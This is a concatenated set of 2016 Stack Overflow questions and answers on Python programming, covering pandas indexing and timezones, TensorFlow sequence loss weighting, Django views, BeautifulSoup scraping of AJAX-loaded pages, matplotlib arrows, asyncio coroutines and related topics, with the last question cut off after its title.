<p>Is there any equivalent of pandas.DataFrame.reset_index which operates on the columns and is able to handle the case of duplicate column names?</p> <p>Obviously I could simply assign new values to columns, what I want to know if there is a method like df.reset_index to do that.</p> <p>Sample Input </p> <pre><code> pd.DataFrame(np.random.rand(5, 3), columns = ['A', 'A', 'B']) A A B 0 0.5 0.3 0.9 1 0.7 0.9 0.3 2 0.9 0.4 0.8 3 0.6 0.2 0.9 4 0.7 0.4 0.6 </code></pre> <p>Expected output</p> <pre><code> 0 1 2 0 0.8 0.1 0.2 1 0.4 0.2 0.4 2 0.3 0.3 0.4 3 0.4 0.1 0.8 4 1.0 0.9 0.9 </code></pre> <p>where 0, 1, 2 is just the default way of pandas to name columns in no name is provided.</p> <p>The existing methods like <code>df.rename</code> or <code>df.reindex_axis</code> do not work when I have duplicate column names</p>
4
2016-07-21T10:43:27Z
38,502,767
<p>you can use <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.set_axis.html" rel="nofollow">set_axis()</a> method:</p> <pre><code>In [54]: df Out[54]: A A B 0 0.934900 0.817182 0.166270 1 0.064543 0.139431 0.249576 2 0.709349 0.731913 0.965048 3 0.284955 0.479898 0.496652 4 0.520749 0.464256 0.999993 In [55]: df.set_axis(1, range(len(df.columns))) In [56]: df Out[56]: 0 1 2 0 0.934900 0.817182 0.166270 1 0.064543 0.139431 0.249576 2 0.709349 0.731913 0.965048 3 0.284955 0.479898 0.496652 4 0.520749 0.464256 0.999993 </code></pre>
2
2016-07-21T11:14:31Z
[ "python", "pandas", "dataframe", "duplicates", "reindex" ]
How to modify the seq2seq cost function for padded vectors?
38,502,366
<p>Tensorflow supports dynamic length sequence by use of the parameter: 'sequence_length' while constructing the RNN layer, wherein the model does not learn the sequence after the sequence size = 'sequence_length' i.e, returns zero vector. </p> <p>However, how can the cost function at <a href="https://github.com/tensorflow/tensorflow/blob/master/tensorflow/python/ops/seq2seq.py#L890" rel="nofollow">https://github.com/tensorflow/tensorflow/blob/master/tensorflow/python/ops/seq2seq.py#L890</a> be modified to encounter the masked sequences, so that cost and perplexity are calculated only on the actual sequences rather than whole padded sequence? </p> <pre><code>def sequence_loss_by_example(logits, targets, weights, average_across_timesteps=True, softmax_loss_function=None, name=None): if len(targets) != len(logits) or len(weights) != len(logits): raise ValueError("Lengths of logits, weights, and targets must be the same " "%d, %d, %d." % (len(logits), len(weights), len(targets))) with ops.op_scope(logits + targets + weights, name, "sequence_loss_by_example"): log_perp_list = [] for logit, target, weight in zip(logits, targets, weights): if softmax_loss_function is None: # TODO(irving,ebrevdo): This reshape is needed because # sequence_loss_by_example is called with scalars sometimes, which # violates our general scalar strictness policy. target = array_ops.reshape(target, [-1]) crossent = nn_ops.sparse_softmax_cross_entropy_with_logits( logit, target) else: crossent = softmax_loss_function(logit, target) log_perp_list.append(crossent * weight) log_perps = math_ops.add_n(log_perp_list) if average_across_timesteps: total_size = math_ops.add_n(weights) total_size += 1e-12 # Just to avoid division by 0 for all-0 weights. log_perps /= total_size return log_perps </code></pre>
0
2016-07-21T10:55:56Z
38,502,547
<p>This function already supports calculating costs for dynamic sequence lengths through the use of weights. As long as you ensure the weights are 0 for the "padding targets", the cross entropy will be pushed to 0 for those steps:</p> <pre><code>log_perp_list.append(crossent * weight) </code></pre> <p>and the total size will also reflect only the non-padding steps:</p> <pre><code>total_size = math_ops.add_n(weights) </code></pre> <p>If you're padding with zeros, one way to derive the weights is as follows:</p> <pre><code>weights = tf.sign(tf.abs(model.targets)) </code></pre> <p>(Note that you might need to cast this to the same type as your targets)</p>
1
2016-07-21T11:04:30Z
[ "python", "dynamic", "tensorflow", "deep-learning", "lstm" ]
For loop did't working in view.py Django?
38,502,382
<p>in view.py</p> <pre><code>Id = [2,3,4,5,6,7,8] for w in Id: A = w Pending = pending(A) data = { 'Pending': Pending, } return render_to_response('dialer_campaign/campaign/list.html', data, context_instance=RequestContext(request)) def pending(campaign_id): A = Campaign_phonebook.objects.values_list('phonebook_id').filter(campaign_id = campaign_id) B = Contact.objects.filter(phonebook_id__in=A).count() C = Subscriber.objects.filter(campaign_id = campaign_id).exclude(status = 1).count() Result = B - C return Result </code></pre> <p>When i add manual value instead of A it gives result,but now i want to give value by for loop it is not working.Why ? Can anybody Help me ?</p> <p>Want changes should i do in templates ?</p> <p><a href="http://i.stack.imgur.com/8H40m.png" rel="nofollow"><img src="http://i.stack.imgur.com/8H40m.png" alt="In image you can see result.it is result when i assign pending(8).I want to get result against loop. Result of every box in pending should be according to value of loop."></a></p> <p>Thanks in Advance..</p>
-3
2016-07-21T10:56:41Z
38,502,820
<p>Take your data object in list and render to the template</p> <p>Refer following code</p> <pre><code>Id = [2,3,4,5,6,7,8] pending_list = [] for w in Id: pending = pending(w) pending_list.append({'pending': pending}) return render_to_response('dialer_campaign/campaign/list.html', pending_list, context_instance=RequestContext(request)) def pending(campaign_id): A = Campaign_phonebook.objects.values_list('phonebook_id').filter(campaign_id = campaign_id) B = Contact.objects.filter(phonebook_id__in=A).count() C = Subscriber.objects.filter(campaign_id = campaign_id).exclude(status = 1).count() Result = B - C return Result </code></pre> <p>Use pending_list in your template. In pending_list list you get all the pending objects.</p>
1
2016-07-21T11:17:08Z
[ "python", "django", "django-views" ]
How can I parse long web pages with beatiful soup?
38,502,390
<p>I have been using following code to parse web page in the link <a href="https://www.blogforacure.com/members.php" rel="nofollow">https://www.blogforacure.com/members.php</a>. The code is expected to return the links of all the members of the given page.</p> <pre><code> from bs4 import BeautifulSoup import urllib r = urllib.urlopen('https://www.blogforacure.com/members.php').read() soup = BeautifulSoup(r,'lxml') headers = soup.find_all('h3') print(len(headers)) for header in headers: a = header.find('a') print(a.attrs['href']) </code></pre> <p>But I get only the first 10 links from the above page. Even while printing the prettify option I see only the first 10 links .Can anyone help me to resolve the issue?</p>
1
2016-07-21T10:57:00Z
38,512,338
<p>The results are dynamically loaded by making AJAX requests to the <code>https://www.blogforacure.com/site/ajax/scrollergetentries.php</code> endpoint.</p> <p>Simulate them in your code with <a href="http://docs.python-requests.org/en/master/" rel="nofollow"><code>requests</code></a> <a class='doc-link' href="http://stackoverflow.com/documentation/python/1792/web-scraping-with-python/8152/maintaining-web-scraping-session-with-requests#t=201607230109412032273">maintaining a web-scraping session</a>:</p> <pre><code>from bs4 import BeautifulSoup import requests url = "https://www.blogforacure.com/site/ajax/scrollergetentries.php" with requests.Session() as session: session.headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'} session.get("https://www.blogforacure.com/members.php") page = 0 members = [] while True: # get page response = session.post(url, data={ "p": str(page), "id": "#scrollbox1" }) html = response.json()['html'] # parse html soup = BeautifulSoup(html, "html.parser") page_members = [member.get_text() for member in soup.select(".memberentry h3 a")] print(page, page_members) members.extend(page_members) page += 1 </code></pre> <p>It prints the current page number and the list of members per page accumulating member names into a <code>members</code> list. Not posting what it prints since it contains names.</p> <p>Note that I've intentionally left the loop endless, please figure out the exit condition. May be when <code>response.json()</code> throws an error.</p>
1
2016-07-21T18:58:33Z
[ "python", "html", "web-scraping", "beautifulsoup" ]
Pandas DatetimeIndex NonExistentTimeError only when creating MultiIndex
38,502,474
<p>I have a <code>list</code> of data that has been read from MongoDB. A subset of the data can be found in <a href="https://gist.githubusercontent.com/philipobrien/280aa38cf024949d33c88fa903ffcb00/raw/1baad587704dfad32b539343b1ab2bffe9ccd9ab/Pandas%2520DatetimeIndex%2520Sample%2520Data" rel="nofollow">this gist</a>. I am creating a DataFrame from this list, using the Date fields to create a <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DatetimeIndex.html" rel="nofollow">DatetimeIndex</a>. The dates were recorded originally in my local timezone, but in Mongo they have no timezone information attached, so I correct for DST as advised <a href="http://stackoverflow.com/questions/38201666/pandas-datetimeindex-from-mongodb-isodate">here</a>.</p> <pre><code>from datetime import datetime from dateutil import tz # data is the list from the gist dates = [x['Date'] for x in data] idx = pd.DatetimeIndex(dates, freq='D') idx = idx.tz_localize(tz=tz.tzutc()) idx = idx.tz_convert(tz='Europe/Dublin') idx = idx.normalize() frame = DataFrame(data, index=idx) frame = frame.drop('Date', 1) </code></pre> <p>everything seems to work fine, and my frame looks like this</p> <pre><code> Events ID 2008-03-31 00:00:00+01:00 0.0 116927302 2008-03-30 00:00:00+00:00 2401.0 116927302 2008-03-31 00:00:00+01:00 0.0 116927307 2008-03-30 00:00:00+00:00 0.0 116927307 2008-03-31 00:00:00+01:00 0.0 121126919 2008-03-30 00:00:00+00:00 1019.0 121126919 2008-03-30 00:00:00+00:00 0.0 121126922 2008-03-31 00:00:00+01:00 0.0 121126922 2008-03-30 00:00:00+00:00 0.0 121127133 2008-03-31 00:00:00+01:00 0.0 121127133 2008-03-31 00:00:00+01:00 0.0 131677370 2008-03-30 00:00:00+00:00 0.0 131677370 2008-03-30 00:00:00+00:00 0.0 131677416 2008-03-31 00:00:00+01:00 0.0 131677416 </code></pre> <p>Now I want to use both the original DatetimeIndex and the ID column to create a <a href="http://pandas.pydata.org/pandas-docs/stable/advanced.html" rel="nofollow">MultiIndex</a> as shown <a href="http://stackoverflow.com/a/38486494/1521933">here</a>. When I try this, however, I get an error that wasn't raised when originally creating the DatetimeIndex</p> <pre><code>frame.set_index([frame.ID, idx]) </code></pre> <blockquote> <p>NonExistentTimeError: 2008-03-30 01:00:00</p> </blockquote> <p>If I just do <code>frame.set_index(idx)</code> without the MultiIndex, it raises no error</p> <p><strong>Versions</strong></p> <ul> <li>Python 2.7.11</li> <li>Pandas 0.18.0</li> </ul>
2
2016-07-21T11:00:52Z
38,502,878
<p>You need <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.sort_index.html" rel="nofollow"><code>sort_index</code></a> first and then append column <code>ID</code> to <code>index</code>:</p> <pre><code>frame = frame.sort_index() frame.set_index('ID', append=True, inplace=True) print (frame) Events ID 2008-03-30 00:00:00+00:00 168445814 0.0 168445633 0.0 168445653 0.0 245514429 0.0 168445739 0.0 168445810 0.0 332955940 0.0 168445875 0.0 168445628 0.0 217596128 1779.0 177336685 0.0 180799848 0.0 215797757 0.0 180800351 1657.0 183192871 0.0 ... ... </code></pre> <p>If need another ordering of levels use <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.swaplevel.html" rel="nofollow"><code>DataFrame.swaplevel</code></a>:</p> <pre><code>frame = frame.sort_index() frame.set_index('ID', append=True, inplace=True) frame = frame.swaplevel(0,1) print (frame) Events ID 168445814 2008-03-30 00:00:00+00:00 0.0 168445633 2008-03-30 00:00:00+00:00 0.0 168445653 2008-03-30 00:00:00+00:00 0.0 245514429 2008-03-30 00:00:00+00:00 0.0 168445739 2008-03-30 00:00:00+00:00 0.0 168445810 2008-03-30 00:00:00+00:00 0.0 332955940 2008-03-30 00:00:00+00:00 0.0 168445875 2008-03-30 00:00:00+00:00 0.0 168445628 2008-03-30 00:00:00+00:00 0.0 217596128 2008-03-30 00:00:00+00:00 1779.0 177336685 2008-03-30 00:00:00+00:00 0.0 180799848 2008-03-30 00:00:00+00:00 0.0 215797757 2008-03-30 00:00:00+00:00 0.0 180800351 2008-03-30 00:00:00+00:00 1657.0 183192871 2008-03-30 00:00:00+00:00 0.0 186439064 2008-03-30 00:00:00+00:00 0.0 199856024 2008-03-30 00:00:00+00:00 0.0 ... ... </code></pre> <p>If need copy column to <code>index</code> use <code>set_index(frame.ID, ...</code>:</p> <pre><code>frame = frame.sort_index() frame.set_index(frame.ID, append=True, inplace=True) frame = frame.swaplevel(0,1) print (frame) Events ID ID 168445814 2008-03-30 00:00:00+00:00 0.0 168445814 168445633 2008-03-30 00:00:00+00:00 0.0 168445633 168445653 2008-03-30 00:00:00+00:00 0.0 168445653 245514429 2008-03-30 00:00:00+00:00 0.0 245514429 168445739 2008-03-30 00:00:00+00:00 0.0 168445739 168445810 2008-03-30 00:00:00+00:00 0.0 168445810 332955940 2008-03-30 00:00:00+00:00 0.0 332955940 168445875 2008-03-30 00:00:00+00:00 0.0 168445875 168445628 2008-03-30 00:00:00+00:00 0.0 168445628 217596128 2008-03-30 00:00:00+00:00 1779.0 217596128 177336685 2008-03-30 00:00:00+00:00 0.0 177336685 180799848 2008-03-30 00:00:00+00:00 0.0 180799848 215797757 2008-03-30 00:00:00+00:00 0.0 215797757 180800351 2008-03-30 00:00:00+00:00 1657.0 180800351 183192871 2008-03-30 00:00:00+00:00 0.0 183192871 186439064 2008-03-30 00:00:00+00:00 0.0 186439064 ... ... </code></pre>
1
2016-07-21T11:19:42Z
[ "python", "datetime", "pandas", "dataframe" ]
Alter the width of an annotate arrow in matplotlib
38,502,594
<p>I am plotting an arrow in <code>matplotlib</code> using <code>annotate</code>. I would like to make the arrow fatter. The effect I am after is a two-headed arrow with a thin edge line where I can control the arrow width i.e. not changing <code>linewidth</code>. I have tried <code>kwargs</code> such as <code>width</code> after <a href="http://stackoverflow.com/questions/15577941/how-to-make-arrow-thinner-matplotlib">this</a> answer but this caused an error, I have also tried different variations of <code>arrowstyle</code> and <code>connectorstyle</code> again without luck. I'm sure it's a simple one!</p> <p>My code so far is:</p> <pre><code>import matplotlib.pyplot as plt plt.figure(figsize=(5, 5)) plt.annotate('', xy=(.2, .2), xycoords='data', xytext=(.8, .8), textcoords='data', arrowprops=dict(arrowstyle='&lt;|-|&gt;', facecolor='w', edgecolor='k', lw=1)) plt.show() </code></pre> <p>I am using Python 2.7 and Matplotlib 1.5.1</p>
0
2016-07-21T11:06:31Z
38,517,497
<p>The easiest way to do this will be by using <a href="http://matplotlib.org/api/patches_api.html#matplotlib.patches.FancyBboxPatch" rel="nofollow"><code>FancyBboxPatch</code></a> with the darrow (double arrow) option. The one tricky part of this method is that the arrow will not rotate around its tip but rather the edge of the rectangle defining the body of the arrow. I demonstrate that with a red dot placed at the rotation location.</p> <pre><code>import matplotlib.pyplot as plt import matplotlib.patches as patches import matplotlib as mpl fig = plt.figure() ax = fig.add_subplot(111) #Variables of the arrow x0 = 20 y0 = 20 width = 20 height = 2 rotation = 45 facecol = 'cyan' edgecol = 'black' linewidth=5 # create arrow arr = patches.FancyBboxPatch((x0,y0),width,height,boxstyle='darrow', lw=linewidth,ec=edgecol,fc=facecol) #Rotate the arrow. Note that it does not rotate about the tip t2 = mpl.transforms.Affine2D().rotate_deg_around(x0,y0,rotation) + ax.transData plt.plot(x0,y0,'ro') # We rotate around this point arr.set_transform(t2) # Rotate the arrow ax.add_patch(arr) plt.xlim(10, 60) plt.ylim(10, 60) plt.grid(True) plt.show() </code></pre> <p>Giving:</p> <p><a href="http://i.stack.imgur.com/lICHn.png" rel="nofollow"><img src="http://i.stack.imgur.com/lICHn.png" alt="enter image description here"></a></p>
0
2016-07-22T03:06:01Z
[ "python", "python-2.7", "matplotlib" ]
python printing the path names of .c files from a directory tree
38,502,657
<p>I'm a beginner in Python. I am trying to work with a directory tree that contains test cases (. files) at variable depth, say, test (top directory) has 2 children test1 and test 2. test1 has further branches t1 and t2 which contain t1.c and t2.c respectively. Similary, test2 has 2 children test21 and test22. test 21 has t3 and t4 which contain t3.c and t4.c resply. test22 has t5 and t6 which have t5.c and t6.c. I am trying to search for the .c file and then print its path using recursion.</p> <p>The error that I am getting is that the code tracerses through only one branch and does not go back to the previous level to go through the other branches. Please help me here.</p> <p>Following is my code:</p> <pre><code># assume, at no level folders and .c files are present at the same time import os import fnmatch # move to test directory os.chdir('/home/gyadav/test') # function to create a list of sub directories def create_subdir_list(): subdirs = os.listdir('.') len_subdirs = len(subdirs) - 1 # while i != length for i in range(0, len_subdirs): # move to next folder os.chdir(subdirs[i]) print os.getcwd() subdirs1 = (os.listdir('.')) print subdirs1 # call function - open thedirectory and check for .c file open_dir('.') # definition of check for . c file def check_for_c(): cfile = fnmatch.filter(os.listdir('.'), '*.c') # if file found if len(cfile) != 0: # save the path path = os.path.dirname(os.path.abspath(cfile[0])) print path os.chdir('..') print os.getcwd() else: create_subdir_list() def open_dir(name): check_for_c() open_dir('.') </code></pre>
1
2016-07-21T11:09:18Z
38,502,879
<p>It's better to use your own way to practice python. But the efficient way would be :</p> <pre><code>&gt;&gt;&gt; PATH = '/home/sijan/Desktop/' &gt;&gt;&gt; import os &gt;&gt;&gt; from glob import glob &gt;&gt;&gt; result = [y for x in os.walk(PATH) for y in glob(os.path.join(x[0], '*.py'))] </code></pre> <p>It will list all the .py files in the folder within the give path.</p>
1
2016-07-21T11:19:54Z
[ "python", "recursion", "tree", "directory" ]
pause and resume Selenium execution
38,502,842
<p>I am looking for an option to pause and resume Selenium execution.</p> <ol> <li>start the selenium execution</li> </ol> <p><strong>2. pause at a certain step explicitly by some means (commandline/in-line code/manually)</strong></p> <ol start="3"> <li>continue execution</li> </ol> <p>I know that we can keep</p> <pre><code>Thread.sleep() </code></pre> <p>or</p> <pre><code>time.sleep </code></pre> <p>I want to give the pause dynamically in between the execution of a test case.</p> <p>Programming language can be Java or Python.</p> <p>is there a way in java or python to pass a pause to the execution dynamically?(probably that can help)</p> <p>Any thoughts and solutions are greatly appreciated.</p>
0
2016-07-21T11:18:05Z
38,503,006
<p>Use an IDE, set breakpoints, and debug your script.</p>
0
2016-07-21T11:25:38Z
[ "java", "python", "selenium" ]
pause and resume Selenium execution
38,502,842
<p>I am looking for an option to pause and resume Selenium execution.</p> <ol> <li>start the selenium execution</li> </ol> <p><strong>2. pause at a certain step explicitly by some means (commandline/in-line code/manually)</strong></p> <ol start="3"> <li>continue execution</li> </ol> <p>I know that we can keep</p> <pre><code>Thread.sleep() </code></pre> <p>or</p> <pre><code>time.sleep </code></pre> <p>I want to give the pause dynamically in between the execution of a test case.</p> <p>Programming language can be Java or Python.</p> <p>is there a way in java or python to pass a pause to the execution dynamically?(probably that can help)</p> <p>Any thoughts and solutions are greatly appreciated.</p>
0
2016-07-21T11:18:05Z
38,503,856
<p>For Python, use can use <code>pdb</code> for debugging. Just drop the following line at the step where you want to pause and it will drop you into the debugger. You might have to get a little familiar with <a href="https://docs.python.org/2/library/pdb.html" rel="nofollow">pdb</a> </p> <pre><code>import pdb; pdb.set_trace() </code></pre>
0
2016-07-21T12:06:45Z
[ "java", "python", "selenium" ]
Asyncio coroutines
38,502,885
<p>I thought I had grokked coroutines with David Beazley's very good <a href="http://www.dabeaz.com/coroutines/" rel="nofollow">presentation</a> but I can't reconcile it fully with the new syntax described in <a href="https://www.python.org/dev/peps/pep-0492/" rel="nofollow">PEP-492</a>. </p> <p>In the presentation, he explains how coroutines can be thought of as a pipeline that gets pushed to as opposed to pulled from like in generators. </p> <p>For example:</p> <pre><code># cofollow.py # # A simple example showing how to hook up a pipeline with # coroutines. To run this, you will need a log file. # Run the program logsim.py in the background to get a data # source. from coroutine import coroutine # A data source. This is not a coroutine, but it sends # data into one (target) import time def follow(thefile, target): thefile.seek(0,2) # Go to the end of the file while True: line = thefile.readline() if not line: time.sleep(0.1) # Sleep briefly continue target.send(line) # A sink. A coroutine that receives data @coroutine def printer(): while True: line = (yield) print line, # Example use if __name__ == '__main__': f = open("access-log") follow(f,printer()) </code></pre> <p>How can one implement the <code>printer()</code> coroutine using this new syntax? I have not yet seen an example where the coroutine gets pushed to using this new syntax. Is it possible?</p>
1
2016-07-21T11:20:10Z
38,503,429
<p>What you have there is not a coroutine in the sense of the <code>asyncio</code> module and/or PEP-492. As the PEP itself says:</p> <blockquote> <p>[This PEP] is relevant only to the kind of coroutine that uses <code>yield</code> as a signal to the scheduler, indicating that the coroutine will be waiting until an event (such as IO) is completed.</p> </blockquote> <ol> <li>There's no scheduler (event loop) involved in your example, and</li> <li>the coroutine is not using <code>yield</code> only "as a signal to the scheduler"; it is really using it to read data.</li> </ol>
1
2016-07-21T11:46:36Z
[ "python", "python-3.x", "coroutine", "python-asyncio" ]
Python Re-ordering the lines in a dat file by string
38,502,906
<p>Sorry if this is a repeat but I can't find it for now. </p> <p>Basically I am opening and reading a <code>dat</code> file which contains a load of paths that I need to loop through to get certain information. </p> <p>Each of the lines in the <code>base.dat</code> file contains <code>m.somenumber</code>. For example some lines in the file might be:</p> <pre><code>Volumes/hard_disc/u14_cut//u14m12.40_all.beta/beta8 Volumes/hard_disc/u14_cut/u14m12.50_all.beta/beta8 Volumes/hard_disc/u14_cut/u14m11.40_all.beta/beta8 </code></pre> <p>I need to be able to re-write the dat file so that all the lines are re-ordered from the <strong>largest m.number to the smallest m.number</strong>. Then when I loop through PATH in database (shown in code) I am looping through in decreasing m.</p> <p>Here is the relevant part of the code</p> <pre><code>base = open('base8.dat', 'r') database= base.read().splitlines() base.close() counter=0 mu_list=np.array([]) delta_list=np.array([]) ofsset = 0.00136 beta=0 for PATH in database: if os.path.exists(str(PATH)+'/CHI/optimal_spectral_function_CHI.dat'): n1_array = numpy.loadtxt(str(PATH)+'/AVERAGES/av-err.n.dat') n7_array= numpy.loadtxt(str(PATH)+'/AVERAGES/av-err.npx.dat') n1_mean = n1_array[0] delta=round(float(5.0+ofsset-(n1_array[0]*2.+4.*n7_array[0])),6) par = open(str(PATH)+"/params10", "r") for line in par: counter= counter+1 if re.match("mu", line): mioMU= re.findall('\d+', line.translate(None, ';')) mioMU2=line.split()[2][:-1] mu=mioMU2 print mu, delta, PATH mu_list=np.append(mu_list, mu) delta_list=np.append(delta_list,delta) optimal_counter=0 print delta_list, mu_list </code></pre> <p>I have checked the possible flagged repeat but I can't seem to get it to work for mine because my file doesn't technically contain strings and numbers. The 'number' I need to sort by is contained in the string as a whole:</p> <pre><code>Volumes/data_disc/u14_cut/from_met/u14m11.40_all.beta/beta16 </code></pre> <p>and I need to sort the entire line by just the m(somenumber) part</p>
0
2016-07-21T11:20:56Z
38,503,870
<p>Assuming that the number part of your line has the form of a float you can use a regular expression to match that part and convert it from string to float.</p> <p>After that you can use this information in order to sort all the lines read from your file. I added a invalid line in order to show how invalid data is handled.</p> <p>As a quick example I would suggest something like this:</p> <pre><code>import re # TODO: Read file and get list of lines l = ['Volumes/hard_disc/u14_cut/u14**m12.40**_all.beta/beta8', 'Volumes/hard_disc/u14_cut/u14**m12.50**_all.beta/beta8', 'Volumes/hard_disc/u14_cut/u14**m11.40**_all.beta/beta8', 'Volumes/hard_disc/u14_cut/u14**mm11.40**_all.beta/beta8'] regex = r'^.+\*{2}m{1}(?P&lt;criterion&gt;[0-9\.]*)\*{2}.+$' p = re.compile(regex) criterion_list = [] for s in l: m = p.match(s) if m: crit = m.group('criterion') try: crit = float(crit) except Exception as e: crit = 0 else: crit = 0 criterion_list.append(crit) tuples_list = list(zip(criterion_list, l)) output = [element[1] for element in sorted(tuples_list, key=lambda t: t[0])] print(output) # TODO: Write output to new file or overwrite existing one. </code></pre> <p>Giving:</p> <pre><code>['Volumes/hard_disc/u14_cut/u14**mm11.40**_all.beta/beta8', 'Volumes/hard_disc/u14_cut/u14**m11.40**_all.beta/beta8', 'Volumes/hard_disc/u14_cut/u14**m12.40**_all.beta/beta8', 'Volumes/hard_disc/u14_cut/u14**m12.50**_all.beta/beta8'] </code></pre> <p>This snippets starts after all lines are read from the file and stored into a list (list called <code>l</code> here). The regex group <code>criterion</code> catches the float part contained in <code>**m12.50**</code> as you can see on <a href="https://regex101.com/r/eW7nG1/1" rel="nofollow">regex101</a>. So iterating through all the lines gives you a new list containing all matching groups as floats. If the regex does not match on a given string or casting the group to a float fails, <code>crit</code> is set to zero in order to have those invalid lines at the very beginning of the sorted list later.</p> <p>After that <code>zip()</code> is used to get a list of tules containing the extracted floats and the according string. Now you can sort this list of tuples based on the tuple's first element and write the according string to a new list <code>output</code>.</p>
0
2016-07-21T12:07:33Z
[ "python", "file", "order", "file.readalllines" ]
calculate linear regression slope matrix (analogous to correlation matrix) - Python/Pandas
38,502,916
<p>Pandas has a really nice function that gives you a correlation matrix Data Frame for your data DataFrame, <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.corr.html" rel="nofollow">pd.DataFrame.corr()</a>.</p> <p>The r of a correlation, however, isn't always that informative. Depending on your application the slope of the linear regression might be just as important. Is there any function that can return that for an input matrix or dataframe?</p> <p>Other than iterating with <a href="http://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.stats.linregress.html" rel="nofollow">scipy.stats.linregress()</a>, which would be a pain, I don't see any way to do this?</p>
0
2016-07-21T11:21:33Z
38,504,303
<p>Slope of a regression line y=b<sub>0</sub> + b<sub>1</sub> * x can also be calculated using the correlation coefficient: b<sub>1</sub> = corr(x, y) * σ<sub>x</sub> / σ<sub>y</sub></p> <p>Using numpy's newaxis to create the σ<sub>x</sub> / σ<sub>y</sub> matrix:</p> <pre><code>df.corr() * (df.std().values / df.std().values[:, np.newaxis]) Out[59]: A B C A 1.000000 -0.686981 0.252078 B -0.473282 1.000000 -0.263359 C 0.137670 -0.208775 1.000000 </code></pre> <p>where <code>df</code> is:</p> <pre><code>df Out[60]: A B C 0 5 6 9 1 4 4 2 2 7 3 5 3 4 3 9 4 6 5 3 5 3 8 6 6 2 8 1 7 7 2 7 8 4 1 5 9 1 6 6 </code></pre> <p>And this is for verification:</p> <pre><code>res = [] for col1, col2 in itertools.product(df.columns, repeat=2): res.append(linregress(df[col1], df[col2]).slope) np.array(res).reshape(3, 3) Out[72]: array([[ 1. , -0.68698061, 0.25207756], [-0.47328244, 1. , -0.26335878], [ 0.1376702 , -0.20877458, 1. ]]) </code></pre>
2
2016-07-21T12:27:40Z
[ "python", "pandas", "linear-regression", "correlation" ]
python pandas assigning to existing dataframe in iteration
38,503,056
<p>I have a long list of files that I want to load into separate data frames. However pandas seems to do nothing like that in line, so I am struggling to do this. In my example below, file_map would actually be imported so I can't have a static mapping between variable and file_name. The example does not achieve what i am looking for because in the loop, pyhton creates a new variable df. Is there somehow a way to actually point at the old variable from the dictionary and set this to whatever pd.read_csv returns?</p> <pre><code>columns = ['c1', 'c2', 'c3'] df_d1 = pd.DataFrame() df_d2 = pd.DataFrame() file_map = { 'data_1.csv': df_d1, 'data_2.csv': df_d2, } for file_name , df in file_map.items(): df = pd.read_csv(path + file_name, header=None, sep=";", names=columns, parse_dates = {'dateTime': ['c1']}, ) </code></pre> <p>Alternatively, are there better ways to generally handle this than what I am doing here? Suggestions are welcome</p>
0
2016-07-21T11:28:10Z
38,503,314
<p>Here's an approach that works well in practice:</p> <pre><code>import glob import os dataframes = {} for fn in glob('/path/to/files/&lt;pattern&gt;.csv'): df = pd.read_csv(fn, ...) dataframes[os.path.basename(fn)] = df </code></pre> <p>Here <code>dataframes</code> is a dictionary of dataframes. I'm using <code>glob</code> to get the actual file list, but of course this list can come from anywhere. <code>os.path.basename</code> returns just the filename, without the <code>/path/to/files</code> part.</p> <p>alternatively if you want all the data in the same dataframe you can also do:</p> <pre><code>data = None for fn in glob('/path/to/files/&lt;pattern&gt;.csv'): df = pd.read_csv(fn, ...) df['source'] = os.path.basename(fn) data = pd.concat([data, df]) if data is not None else df </code></pre> <p>Here <code>data</code> at the end of the loop is a dataframe with all data. Of course this assumes the files are of the same content type, i.e. you actually want one dataframe.</p>
1
2016-07-21T11:40:39Z
[ "python", "pandas" ]
Get intersection elements of nested dictionaries in Python
38,503,084
<p>Let's say I have a list of dicts. For example, the list contains the following dicts:</p> <pre><code>{'david': {'status': 'available', 'type': 'human, 'location': [2, 3, 4]}, 'kuka': {'type': 'robot'}} {'david': {'status': 'available', 'location': [2, 3, 4]}, 'kuka': {'status': 'available', 'type': 'robot'}} </code></pre> <p>(The nesting level is not fixed)</p> <p>As a result, I want to have:</p> <pre><code>{'david': {'status': 'available', 'location': [2, 3, 4]}, 'kuka': {'type': 'robot'}} </code></pre> <p>As a result, I want to have dict, which contains common elements, which are existing in both dicts, not only the keys.</p> <p><br> Thanks for any help.</p>
0
2016-07-21T11:29:55Z
38,504,949
<p>I don't quite understand what you mean by 'intersection'. If you want to get the common attributes of each dictionary item, you can use a <code>set</code> to get all common keys with following codes.</p> <pre><code>common_keys = reduce(set.intersection, [set(i.keys()) for i in d.values()]) </code></pre> <p>Then you can iterate over the dictionary to filter the common keys and values.</p>
0
2016-07-21T12:58:46Z
[ "python", "dictionary", "nested" ]
Get intersection elements of nested dictionaries in Python
38,503,084
<p>Let's say I have a list of dicts. For example, the list contains the following dicts:</p> <pre><code>{'david': {'status': 'available', 'type': 'human, 'location': [2, 3, 4]}, 'kuka': {'type': 'robot'}} {'david': {'status': 'available', 'location': [2, 3, 4]}, 'kuka': {'status': 'available', 'type': 'robot'}} </code></pre> <p>(The nesting level is not fixed)</p> <p>As a result, I want to have:</p> <pre><code>{'david': {'status': 'available', 'location': [2, 3, 4]}, 'kuka': {'type': 'robot'}} </code></pre> <p>As a result, I want to have dict, which contains common elements, which are existing in both dicts, not only the keys.</p> <p><br> Thanks for any help.</p>
0
2016-07-21T11:29:55Z
38,506,628
<p>You can recursively iterate over all dictionary keys. The most compact way of writing this is probably</p> <pre><code>def common_items(d1, d2): return {k: common_items(d1[k], d2[k]) if isinstance(d1[k], dict) else d1[k] for k in d1.viewkeys() &amp; d2.viewkeys()} </code></pre> <p>I'd recommend to spell the dictionary comprehension out to a for loop to make the code more readable, and allow to raise an error in case there are differing values:</p> <pre><code>def common_items(d1, d2): result = {} for k in d1.viewkeys() &amp; d2.viewkeys(): v1 = d1[k] v2 = d2[k] if isinstance(v1, dict) and isinstance(v2, dict): result[k] = common_items(v1, v2) elif v1 == v2: result[k] = v1 else: raise VallueError("values for common keys don't match") return result </code></pre>
0
2016-07-21T14:13:10Z
[ "python", "dictionary", "nested" ]
Using groupby() together with filter in list comprehensions
38,503,159
